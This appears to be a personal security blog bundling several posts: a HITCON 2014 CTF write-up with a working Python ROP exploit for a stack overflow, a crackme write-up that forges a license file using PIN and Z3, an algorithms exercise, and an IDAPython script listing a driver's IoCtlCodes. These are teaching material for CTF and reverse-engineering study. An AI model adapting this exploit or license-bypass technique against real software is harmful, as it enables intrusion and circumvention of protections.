150 is the loneliest number

Last week I participated in HITCON CTF. Well, participated… I downloaded some challenges to solve offline. I have a baby at home and babies are good at two things:

  • crying all the time, craving for attention and not letting daddies to play CTFs
  • being scapegoats. This way daddies can excuse their lack of skills, the way I just did :)

</newdaddyrant>

Where was I? Ah, yes. The challenges. After the CTF’s end, the usual suspects posted several writeups regarding the upper levels (350 points or more). Apparently is not cool to write about the “lame” challenges but since I am a “lamer” I will write about a pwn150 level.

Reconnaissance

This challenge grants you 150 points (read, peanuts) and is named rsbo. My guess is this means Really Simple Buffer Overflow as you will see in a moment.


$ file rsbo
rsbo: ELF 32-bit LSB  executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=f55cab43de46d4c195e09e1f62b22284b4fec38b, not stripped

rsbo takes input from stdin and outputs its bytes, randomly shuffled, to stdout.

carlos@xubuntu:~$ ./rsbo
ABCDEFGHIJK
GEBAHDCJ
IKFcarlos@xubuntu:~$

The breakline you see is the last byte of the input (0x0A) which has been randomly swapped as well.

What is interesting is that the binary is opening the flag file at the very beginning of its execution :)

carlos@xubuntu:~$ strace ./rsbo
execve("./rsbo", ["./rsbo"], [/* 63 vars */]) = 0
brk(0)                                  = 0x9dc2000
[...]
open("/home/rsbo/flag", O_RDONLY)       = 3
read(3, "YOMAMAYOPAPA\n", 16)           = 13
time(NULL)                              = 1408653521
close(3)                                = 0
read(0,

Yes, the contents of the flag in my test system is “YOMAMAYOPAPA“.

You can see how the output of strace hangs by read(0,…) waiting for my input, since read() is a blocking operation. This will be important later.

Sending as input a series of 500 “A”s causes a segmentation fault. That is interesting… Doing some binary search it appears that the crash is caused by an input of 0x55 characters or longer.

It’s time to load the binary in IDA.

 

Closer inspection

 

The first interesting function, init, is where the flag is read. At the beginning I thought I could use a memory leak to read it from memory but the buffer containing it is zeroed shortly after that and the file is closed. Apparently the flag is being used as a seed to initialize random.

 

Read flag, destroy flag :(
Read flag, destroy flag :(

 

Bummer. It appears I will have to do some classical pwning in order to read the flag. Let’s see what else is happening here.

After calling init, the function main reads my input (function read_80_bytes) and copies them to the stack at ESP + 0x10 …

Aaaand... Stack Overflow!
Aaaand… Stack Overflow!

… but after doing some stack alignment, only 0x70 bytes are reserved for the stack, that is I can easily overflow the stack and overwrite the return pointer.

Can it be that easy? [Spoiler: no, it is not]

By sending a lot of “A”s as input I should see the program crashing when trying to access 0x41414141, isn’t it?

Well it is not, instead it is crashing all the time at EIP 08048701:


rsbo[31242]: segfault at bfc7752b ip 08048701 sp bfc73400 error 6 in rsbo[8048000+1000]

Obviously something else is going on here. Besides, remember that it was possible to crash the process with “only” 0x55 bytes?

Let’s see what lies at ox08048701, within the main function:

Random shuffle algorithm
Random shuffle algorithm

The segfault has its origin in a write operation at the end of the mechanism randomly shuffling our input. In a nutshell the algorithm is like this:

For each byte of input, get a random byte from its left and swap both. Go to the next byte of input and repeat until you reach the end of the input buffer.

More precisely, until the array index of the current input’s byte is greater or equal to the input’s length.

The problem is that several values central to this algorithm are saved on the stack as well and can be influenced. Roughly the stack looks like this:

  • ESP + 0x10 AAAAAAAAAAAAAAA.
  • […]
  • ESP + 0x60 temporary value (for swapping bytes)
  • ESP + 0x64 random value (array index byte left of current one)
  • ESP + 0x68 length of input (some crazy guy put it there)
  • ESP + 0x6C array index of the current byte (used to traverse the buffer)
  • […]

So the problem arises when I send a buffer larger that 0x54 because then I modify the array index of the byte to swap. I end trying to swap bytes between my payload and something at a random address, which very likely causes an access violation. The random nature of the whole swapping process is not going to help…. so how am I going to solve this?

 

The best compromise

The good thing about CTFs is that we do not need a reliable exploit, it just have to work once in order to get the flag. So an approach along the lines of “It works all the time, 60 percent of the time” is cool. Therefore I opted for sending a payload with all first 0x54 bytes equal to zero. This way, through random swapping two things were rather probable:

  • the random index will not be too out of bounds (moderate values, pointing to harmless, writable locations)
  • length of input will be overwritten with a small value, stopping the swapping algorithm. In the end I want to have some part of my payload not being mangled :)

So sending this payload avoids the crash sometimes… good enough.

Now, even being able to avoid the crash I still have a couple of problems to solve:

  • I am left with a very small payload, around 20 bytes to work with
  • NX is activated, so I can not execute this on the stack
  • ASLR is not activated for the main image but it is for the stack

 

Time for a ROP chain

I need to build a ROP chain in order to defeat NX. This should be relatively easy since the main binary has not been compiled as PIE and therefore its gadgets would be at predictable locations and can be hardcoded in the payload. Moreover, it only has to read the flag from the file and write it to stdout.

My payload is too small to accomplish this, so I need to write more data to the stack. I can use the function read_80_bytes(out_buf) for that. However, ASLR randomizes the stack on every run, that means I must find a way to determine a valid stack address.

After carefully checking the stack values right before the overflow I found that I can partially overwrite a value with the last byte of my payload (0x00), this way obtaining an address right at the end of my payload. Using this as the argument of read_80_bytes I was able to extend my ROP chain and I had enough space to finally read the flag.

The final solution implemented in… Python, what else? :)

#
# rsbo (HITCON 2014)
#
import sys
import time
import socket

payload1 = (
            "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
            "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
            "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
            "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
            "\x00\x00\x00\x00"          # will be randomly shuffled (84)
            "AAAAAAAAAAAAAAAAAAAAAAAA"  # padding (24)
            "\x5C\x86\x04\x08"          # read_80_bytes() - This smashes the original EIP
            "\x9D\x87\x04\x08"          # gadget: pop;pop;pop;ret - this continues in payload2
            "\x00"  # ASLR bypass for the poor (smashes the last byte of a stack address)
                    # eff. this writes the argument for read_80_bytes (out buffer)
)

payload2 = (
            # These bytes are copied to the stack by the second read_80_bytes()
            "\x20\x84\x04\x08"  # open(.plt)
            "\x9E\x87\x04\x08"  # saved EIP for open(), next EIP after it (gadget pop;pop;ret)
            "\xD0\x87\x04\x08"  # char *filename (for open)
            "\x00\x00\x00\x00"  # fd for open()
            "\xE0\x83\x04\x08"  # read()
            "\x9D\x87\x04\x08"  # saved EIP for read(), next EIP after it (gadget pop;pop;pop;ret)
            "\x03\x00\x00\x00"  # fd for read (0x3)
            "\x00\xA0\x04\x08"  # void *buf to write the read flag :) (.got.plt)
            "\x10\x00\x00\x00"  # size_t nread
            "\x50\x84\x04\x08"  # write (.plt)
            "\x0D\xF0\xAD\x0B"  # Saved EIP: it will crash here :)
            "\x01\x00\x00\x00"  # fd for write() stdout = 1
            "\x00\xA0\x04\x08"  # void *buf for write to stdout (prev. read) (.got.plt)
            "\x10\x00\x00\x00"  # size_t count
)

s = socket.create_connection(('localhost', 4444))
s.send(payload1)
time.sleep(1)
s.send(payload2)
print "Recv:", s.recv(1024)

GrepPINg through binaries

tl;dr: Oh, no! Antidebugging! Fuck it, we will use DBI.

Intro

So let’s say that you find a marketing stunt on the net, coming from a security academy online. It consists of a binary file consuming a “license file”. Your mission, should you decide to accept it is to craft that license file and get the “good boy” message.
Problem: almost every antidebugging/obfuscation/annoyance has been used in the binary in order to avoid its analysis.
We could now of course spend countless hours trying to defeat these antidebugging mechanisms and deobfuscate the assembly. But let’s be honest here, who in his right mind likes to deobfuscate binaries? (answer: Jurriaan Bremer a.k.a. @skier_t does)

Another approach would be to avoid the whole drama at once and use a combination of static reversing and dynamic binary instrumentation (DBI). To be more precise we will use Intel’s PIN.

First stop, IDA

We start of course by opening the file in IDA Pro for a first contact with the application.
It is apparently a simple C++ application. IDA does a good job of identifying and renaming most of the 500 functions with their standard C++ mangled name. There are a bunch of unidentified (sub_xxx) functions, those will implement the actual program logic and we will have to concentrate on those.

Functions

Since we can not use a debugger it would be at least useful to know which functions were executed and in which order, that is, to trace the binary execution. For that purpose we will use a slightly modified version of one of the PIN examples (named “PinTool_tracer.dll”, you can find and old version attached at the end of this post)

By using a bit of IDAPython it is easy to export a dictionary of function addresses and its corresponding names and import them to our trace file, ending with something like this:

WithFuncInfo

Is it just me or you see a pattern as well? What is this? (More on that later)

Of course we haven’t solved the challenge already, since we just improvised a “license file” with random contents but somewhere, the function that checks if the file contents are right had to be executed.

There are several ways to proceed at this point and I decided to give a shot to a tiny script. It is an IDAPython PoC showing how to “identify” cryptographic functions, just by counting the amount of “strange” instructions. Functions with a high percentage of these instructions (like xor, neg, shl, shr, etc.) will be shown for further analysis. It is a long shot but it takes five minutes.

This is the output:

[*] Analysing...

[!] Potential Crypto: sub_401450: 11.764706 %
[!] Potential Crypto: ___security_init_cookie: 11.111111 %
[!] Potential Crypto: __SEH_prolog4: 9.523810 %
[!] Potential Crypto: _findenv: 8.823529 %
[...]

The function

Not bad, most of the functions are somehow standard and created by the compiler but the first one on the list is a custom one… let’s check it out :)

This function is doing the following:

  • Getting a handle to the file using CreateFileA
  • Checks its size using GetFileSize (it must be 16 bytes)
  • Reads the file contents to memory using ReadFile [1]
  • Does some arithmetic with its 4 dwords and compares the result to a constant value

And this is exactly the interesting part.  Depending on the results of this operation the function returns either 1 or 0. Sounds like boolean to me, so I put my money on the branch returning 1. (To be sure I patched the binary to return always true and verified that was it)

Let’s focus on the license check, here is the code:

xor_stuff:
.text:004014AF mov ecx, [esi+0Ch]
.text:004014B2 xor ecx, [esi+8]
.text:004014B5 push esi
.text:004014B6 xor ecx, [esi+4]
.text:004014B9 xor ecx, [esi]
.text:004014BB xor ecx, xor_key_0
.text:004014C1 xor ecx, xor_key_1
.text:004014C7 xor ecx, xor_key_2
.text:004014CD xor ecx, xor_key_3
.text:004014D3 xor ecx, dw_unk_41B2C4
.text:004014D9 cmp ecx, 4C833425h
.text:004014DF jnz short wrong_stuff

This is very simple, if the file contains four dwords (32bit values) A, B, C, D, then the check can be expressed as:

D ^ C ^ B ^ A ^ xor_key_0 ^ xor_key_1 ^ xor_key_2 ^ xor_key_3 ^ dw_unk_41B2C4 == 0x4C833425

The variables xor_key_N were initialized at compile time, so their (initial) values can be seen in the binary. Anyway these are not the values at the moment this function is executed since there is (at least) another function modifying these exact variables. Guess which one?

Modify_xor_vars

Yes, it’s the function we saw executing a bazillion times on our trace. I haven’t checked it but my guess is that the program raises exceptions in order to execute code “hidden” in previously defined exception handlers and alike.

About dw_unk_41B2C4, this variable wasn’t initialized and therefore we had to get its value at realtime. Yes, another small PinTool tracking memory writes, since we know the address where is going to be located (0x41B2C4).

Game of registers

So you see, it is pretty messy. We have to get the value of five different variables at exactly the time this calculation is executed… Do we?

Not really. Since the XOR is such a simple operation we just need the result of XORing all these variables. This way I can write a PinTool that reads only one value at a certain execution point, namely the value of the register ECX at the point where the comparison is done. If you are interested in knowing how this is done, go to the PIN manual online here and search for “PIN_GetContextReg” for several examples.

For the people who think graphically:

D ^ C ^ B ^ A ^ xor_key_0 ^ xor_key_1 ^ xor_key_2 ^ xor_key_3 ^ dw_unk_41B2C4 =

D ^ C ^ B ^ A ^ (xor_key_0 ^ xor_key_1 ^ xor_key_2 ^ xor_key_3 ^ dw_unk_41B2C4) =

D ^ C ^ B ^ A ^ monster_xor = value_read_by_pin_tool

If I craft a file containing only zero bytes then I’ll be able to read that combined xor value, named “monster_xor” :)

0x00 ^ monster_xor = monster_xor = value_read_by_pin_tool = 0xCF6FC79D

(Actually whatever combination of values that result in a zero would do, it could be a file filled “A”s)

Solving the equation

The rest is pretty easy, just get four values that satisfy the following discrete equation:

D ^ C ^ B ^ A ^ 0xCF6FC79D = 0x4C833425

Although this is rather straightforward I couldn’t resist the temptation of using Z3 (Python bindings, yay!)

This is the code that solves the equation for A, B, C, D:

# solution must be a file containing 16 bytes (4 dwords: a, b, c, d)
# d^c^b^a^key_0^key_1^key_2^key_3^dw_unk == 0x4C833425
import z3
import struct

# Since the key_N are constants, we can simplify this in advance ;)
monster_xor = 0xcf6fc79d
solution = 0x4C833425

s = z3.Solver()

a = z3.BitVec('a', 32)
b = z3.BitVec('b', 32)
c = z3.BitVec('c', 32)
d = z3.BitVec('d', 32)

calc = d ^ c ^ b ^ a ^ monster_xor

s.add(calc == solution)

if s.check() == z3.sat:
    m = s.model()
    for d in m.decls():
        print "%s: %s" % (d.name(), m[d])

The solution (one of them) is:

a = b = 0
c = 2147483648 # 0x80000000
d = 65860536     # 0x3ECF3B8

Now we just need two lines of python to generate the binary license file:

with open("eLexxxxxity.dat", 'wb') as f:
    f.write(struct.pack("<IIII", a, b, c, d))

Check that everything has been written correctly…

eLearnSecurity

… and success ;)

Success

[1] I could have started looking for ReadFile and tracing forward the operations on the read contents… but I wasn’t expecting the ReadFile and the complete logic of the challenge to be all in one place! ;)

OHM 2013 Slides

The last month I was at the OHM2013, a very recommendable experience by the way.

Since a picture is worth a thousand words (or a million if it’s HD), here a couple of impressions:

BigAssLights

FuckYeahNerds

ResidentEvilCamping

CampingLikeABoss

AFrakingUnicorn

I was at the Village 42 kindly invited by the people of Schuberg Philis to give a short talk about DBI, debugging automation and Python. Just an introduction to frameworks like Winappdbg, vtrace , Intel PIN and their uses, with some examples.

NOTE: Somehow this “short” talk ended lasting for about three hours. (I hereby apologize to the attendees :P)

Anyway, some people expressed their interest in seeing the slides so I will post here the .pptx file (notes included) and the PoCs used in the demos. I hope somebody find it useful.

Also, without further ado (kind of a douchy expression):

Slides: BinaryVoyeurismOHM2013

PoC Code: OHM.2013.Code.zip (NOTE: WordPress doesn’t allow .zip files so I added a .pdf ending. Remove it and you are good to go!)

P.S. If you go to OHM don’t forget to take *rubber boots* with you!

Eulerian Tour

I suck at algorithms. Discrete math in general actually :) But you know, it’s working outside of your comfort zone what makes you progress, so I’m taking Udacity’s course on Algorithms.

One of the first assignments is to find an algorithm to find an eulerian tour and implement in Python. An eulerian tour is path that begins and ends on the same node of a graph and traverses all edges only once.

Well, is one of the first problems, so how difficult can it be, right?

After several notebook pages it turned out to be not that trivial (at least to me). I think I worked on it for a week and tried several different approaches “this can be solved using depth first search for sure…”, “maybe some recursion will help…”

Come on, it can't be that difficult
This is… madness!

Some approaches worked for simple graphs but failed when tested against bigger ones (20 nodes or so).

Then I thought again about the conditions a graph must fulfill in order to have an eulerian path: it must be connected and all the nodes must have even degree

I realised that this would happen if you construct a graph fusing several single loops together. The nodes belonging to only one single loop will have degree 2 (one in, one out), the nodes pertaining to two loops will have degree 4 (twice in and out), etc. In general the degree of a node is 2 * N (where N is the number of single loops it belongs to)

So i decided to write an iterative algorithm that looks for a single loop (A -> B -> C -> A), saves it, removes it from the graph, then looks for another loop on the remaining graph and so on. Until the graph is null, that is, no edges present.

Afterwards is just a matter (tricky code, though) of “piercing” the loops together by their common nodes.

The code is here:

# Find Eulerian Tour
#
# Write a function that takes in a graph
# represented as a list of tuples
# and return a list of nodes that
# you would follow on an Eulerian Tour
#
# For example, if the input graph was
# [(1, 2), (2, 3), (3, 1)]
# A possible Eulerian tour would be [1, 2, 3, 1]

################################################################
# Auxiliary
################################################################    

def get_degrees(edge_list):
    ''' This returns a dictionary of 
        nodes and their degrees '''

    degrees = dict()    
    for u, v in edge_list:
        degrees[u] = degrees.get(u, 0) + 1
        degrees[v] = degrees.get(v, 0) + 1

    return degrees

def get_highest_degree_node(edge_list):
    degrees =  get_degrees(edge_list)
    sorted_degrees = sorted(degrees, key = lambda k: degrees[k], reverse = True)

    return sorted_degrees[0]

def get_branches(edge_list, node):
    ''' Returns all nodes reachable from a node '''
    branches = []
    for u, v in edge_list:
        if u == node:
            branches.append(v)
        elif v == node:
            branches.append(u)
        else:
            pass

    degrees = get_degrees(edge_list)

    # Sort this by ascending degree
    # Meaning: lower degree nodes get visited earlier        
    return sorted(branches, key = lambda k: degrees[k])

def remove_branch(edge_list, current_node, branch):
    # Remove the branch, since it has been traversed already
    if ((current_node, branch)) in edge_list:
        edge_list.remove((current_node, branch))
    elif ((branch, current_node)) in edge_list:
        edge_list.remove((branch, current_node))
    else:
        pass

    return edge_list

def next_node(current_node, edge_list):
    ''' I don't need anything else 
        * where I am 
        * what is left unexplored 
        @return: new node '''

    branches = get_branches(edge_list, current_node)
    if branches != []:
        branch = branches[0]
        edge_list = remove_branch(edge_list, current_node, branch)
        return branch
    else:
        return None

def fusion_loop(original_list, element, new_element):
    ''' It fuses two loops by a common element '''
    idx = original_list.index(element)
    left = original_list[:idx]
    right = original_list[idx + 1:]

    new_list = left + new_element + right

    return new_list

def rotate_around(original_list, element):
    ''' It cycles the list so the cycle starts at element '''
    idx = original_list.index(element)
    if idx == 0:
        return original_list
    else:
        return original_list[idx:] + original_list[1:idx] + [element]

def find_common_element(list1, list2):
    ''' Returns the FIRST OCURRENCE of a common element '''
    for e1 in list1:
        if e1 in list2:
            return e1

    return None

################################################################
# The algorithm itself
################################################################

def find_eulerian_tour(edge_list, loops_list = []):

    while edge_list != []:

        branch = None    
        current_node = get_highest_degree_node(edge_list)
        nodes_visited = [current_node]

        print "\nStarting in node %d (degree: %d)..." % (current_node, get_degrees(edge_list)[current_node])

        while branch != nodes_visited[0]:
            branch = next_node(current_node, edge_list)
            nodes_visited.append(branch)
            current_node = branch

        loops_list.append(nodes_visited)

    ########################################################
    # Post-processing of loops_list
    print "loops_list:", loops_list
    eulerian_tour = loops_list[0] # kind of arbitrary
    loops_list.remove(loops_list[0])

    while loops_list != []:
        for loop in loops_list:
            common_node = find_common_element(eulerian_tour, loop)
            if common_node:
                cycled_loop = rotate_around(loop, common_node)
                eulerian_tour = fusion_loop(eulerian_tour, common_node, cycled_loop)
                loops_list.remove(loop)
                print "* eulerian_tour:", eulerian_tour

    return eulerian_tour

################################################################
# Tests
################################################################
def test(my_graph):
    print my_graph, "len:", len(my_graph)
    my_eulerian_tour =  find_eulerian_tour(my_graph)
    print my_eulerian_tour, "length:", len(my_eulerian_tour)

test([(1, 2), (2, 3), (3, 4), (4, 1), (2, 5), (5, 2)])
test([(1, 2), (2, 3), (3, 4), (4, 1), (2, 5), (5, 4), (4, 2)])    
test([(0, 1), (1, 5), (1, 7), (4, 5), (4, 8), (1, 6), (3, 7), (5, 9), (2, 4), (0, 4), (2, 5), (3, 6), (8, 9)])
test([(1, 13), (1, 6), (6, 11), (3, 13), (8, 13), (0, 6), (8, 9),(5, 9), (2, 6), (6, 10), (7, 9), (1, 12), (4, 12), (5, 14), (0, 1),  (2, 3), (4, 11), (6, 9), (7, 14), (10, 13)])
test([(8, 16), (8, 18), (16, 17), (18, 19), (3, 17), (13, 17), (5, 13),(3, 4), (0, 18), (3, 14), (11, 14), (1, 8), (1, 9), (4, 12), (2, 19),(1, 10), (7, 9), (13, 15), (6, 12), (0, 1), (2, 11), (3, 18), (5, 6), (7, 15), (8, 13), (10, 17)])

The walking 0xDEAD

TitleSlide

I thought about opening this post writing “Sorry I haven’t posted in a long time…” Then I realized most probably nobody cares, so I didn’t.

tl;dr: Binary reverse engineering and zombies. Success is guaranteed :)

Recently I got through a friend the opportunity of presenting a short (one day) training involving binary reverse engineering and some malware analysis. Since I’ve been thinking about putting together this kind of training for a while, I thought it would be a great opportunity to create a raw version and get a first round of valuable feedback.

As I mentioned, due to time constraints mainly, the slides are a bit on top of each other and it’s very rough around the edges. I’ll have to work out some kinks in next versions and if you are an experienced reverser, I’m sure you will spot a couple of embarrasing mistakes…

That said, the training went pretty well. Although some people had only a first knowledge of the topic (well, that’s why you go to a training, isn’t it?) they were, luckily for me, very competent people. They were actually absorbing information at an alarming rate!

There was a complementary software package that had to be installed in a VM to be able to follow along and spend some time with a couple of short exercises. At the end two malware samples were analyzed and typical tricks used by malicious code were presented. Along the lines “If you see this and that, be pretty sure this software is up to no good…”

Without the software package or the proper explanation the slides are sometimes difficult to follow but anyway they look nice :P

NOTE: I realize that I may have broken all kind of copyrights, past, present and future but since there was no financial profit involved and this is for the community, I’m sure the people of AMC will find room in their hearts to forgive me.

NOTE2: I tried to give proper credit where I took something from the internet. If it’s not on the slide self, it’s on the related code on the software package. If not, I just forgot and I’m a jerk. Drop me a line and I’ll add it.

I know, less talking and more showing the slides. They are here: The Walking 0xDEAD slides

Show me your IoCtlCodes!

tl;dr: If you want to get a list of valid IoCtlCodes reverse the binaries that talk to the driver from userspace.

Knock, Knock. This is userspace.

In a nutshell, programs that install drivers on your OS (let’s say AV, packet sniffers, etc.) install userland software as well. This software needs to talk to the driver (in kernel space). The glue allowing those two programs, living in different worlds, to talk to each other is implemented via the DeviceIoControl API.

BOOL WINAPI DeviceIoControl(
  _In_         HANDLE hDevice,
  _In_         DWORD dwIoControlCode,
  _In_opt_     LPVOID lpInBuffer,
  _In_         DWORD nInBufferSize,
  _Out_opt_    LPVOID lpOutBuffer,
  _In_         DWORD nOutBufferSize,
  _Out_opt_    LPDWORD lpBytesReturned,
  _Inout_opt_  LPOVERLAPPED lpOverlapped
);

This is pretty easy, just open a handle to the device from userland, call the function with this handle and a couple of buffers: one for the input data, an0ther for the output one.

Sounds easy, doesn’t it? Well, not that fast. There are a couple of issues here…

One of them is the IoControlCode. What the hell is that?

Think about this like a network port, something that allows you to multiplex. So you sent data to a driver, but how does it know what it was intended for? I mean, a driver is a complex piece of software, sure it can do more than one thing with the data in your buffer!

Now, if you checked carefully the DeviceIoControl declaration, you have notice that this number is 32bits long. It goes without saying, is going to be difficult to try random values and hope you got the correct one. It’s necessary to get a list of valid codes somehow.

This is rather easy if you have the binaries of the userland application. Just look for calls to DeviceIoControl and read the second parameter. As you will see sometimes this would be an indirect reference (like for example, “edx”) but anyway is a good way to get an initial list very quickly.

With this in mind, a first version of an IDA Pro script implementing exactly this could be:

# Find the IoControlCodes corresponding to
# calls to DeviceIOControl within a binary

from idaapi import *
from idautils import *
from idc import *

##########################################################
# This class implements a fifo queue
class fqueue(list):
	def __init__(self, n):
		self.n = n

	def push(self, a):
		self.append(a)
		if len(self) > self.n:
			self.pop(0)

##########################################################

gpRegList = ['eax', 'ebx', 'ecx', 'edx']
ioccList = []
callerList = []
pushQueue = fqueue(2)

dioc_ea = LocByName("DeviceIoControl") # EA

print "DeviceIoControl found at 0x%08x" % dioc_ea

for caller in XrefsTo(dioc_ea, True):
	# This is the address (within a function)
	# where the reference was made
	caller_ea = caller.frm

	if caller_ea not in callerList:
		# IDA Pro shifts duplicates, get rid of them
		callerList.append(caller_ea)
		print "xref @ 0x%08x (%s)" % (caller_ea, GetFunctionName(caller_ea))
	else:
		continue

	# The dwIoControlCode must be the second 
	# PUSH xxx before the CALL instruction
	# So we need to keep track of the PUSH instructions
	for ins in FuncItems(caller_ea):
		disasm = GetDisasm(ins)
		if "push" in disasm:
			# Save the PUSH instruction's operand
			pushQueue.push(GetOpnd(ins, 0))
		elif ins == caller_ea:
			# At this moment we hit the corresponding CALL instruction
			# First item in Queue is second "oldest" push
			iocc = pushQueue[0]

			if iocc in gpRegList:
				print "NOTE: IoControlCode was %s at 0x%08x. Check manually" % (iocc, caller_ea)
			else:
				if pushQueue[0] not in ioccList:
					ioccList.append(pushQueue[0])
		else:
			pass

# Print all the gathered IoControlCodes

print "%d IoControlCodes found!" % len(ioccList)

for io in ioccList:
	print "[*]", io

delivering such output:

DeviceIoControl found at 0x650320e4
xref @ 0x6500c19a (AavmDetectionsHaveChanged)
xref @ 0x6500c30b (sub_6500C220)
xref @ 0x6500c62b (sub_6500C220)
xref @ 0x6500c945 (sub_6500C220)
xref @ 0x6500caff (sub_6500CA80)
xref @ 0x6500cc03 (sub_6500CA80)
xref @ 0x6500cc5e (sub_6500CA80)
xref @ 0x6500ccd8 (sub_6500CA80)
xref @ 0x6500cd03 (sub_6500CA80)
xref @ 0x6500cf20 (sub_6500CE90)
xref @ 0x6500cfb1 (sub_6500CE90)
xref @ 0x6500f823 (AavmStart)
xref @ 0x650102bf (AavmStop)
xref @ 0x65016a30 (sub_65016900)
xref @ 0x650274fb (sub_65027480)
xref @ 0x65027792 (sub_65027480)
xref @ 0x6502797d (sub_65027850)
xref @ 0x65027e92 (sub_65027E70)
xref @ 0x65027f67 (sub_65027EA0)
xref @ 0x65029f16 (sub_65029EF0)
NOTE: IoControlCode was edx at 0x65029f16. Check manually
xref @ 0x65029fd1 (sub_65029F40)
xref @ 0x6502a0af (sub_6502A030)
xref @ 0x6502a1d5 (sub_6502A0E0)
xref @ 0x6502a4fb (sub_6502A430)
xref @ 0x6502a6a7 (sub_6502A610)
xref @ 0x6502a7bb (sub_6502A6E0)
xref @ 0x6502fba2 (sub_6502FB70)
xref @ 0x6502fbf3 (sub_6502FBC0)
19 IoControlCodes found!
[*] 0B2C88028h
[*] 0B2D60030h
[*] 0B2D60034h
[*] 0B2D60028h
[*] 0B2D6002Ch
[*] 0B2D60014h
[*] 0B2D6001Ch
[*] 0B2D6000Ch
[*] 0B2D600A4h
[*] 0B2D600B4h
[*] 0B2D600C0h
[*] 0B2D600B8h
[*] 82AC805Ch
[*] 82AC0050h
[*] 82AC0054h
[*] 82AC8120h
[*] 82AC8214h
[*] 82AC8218h
[*] 80002008h

Excellent. Now the following problem arises. Which is the name of the device(s) I need to get a handle for? And in the probable case there are more than one… which IoControlCodes correspond to which devices?

But now is time for breakfast, so this is left for an update, should I find a way to automate it :)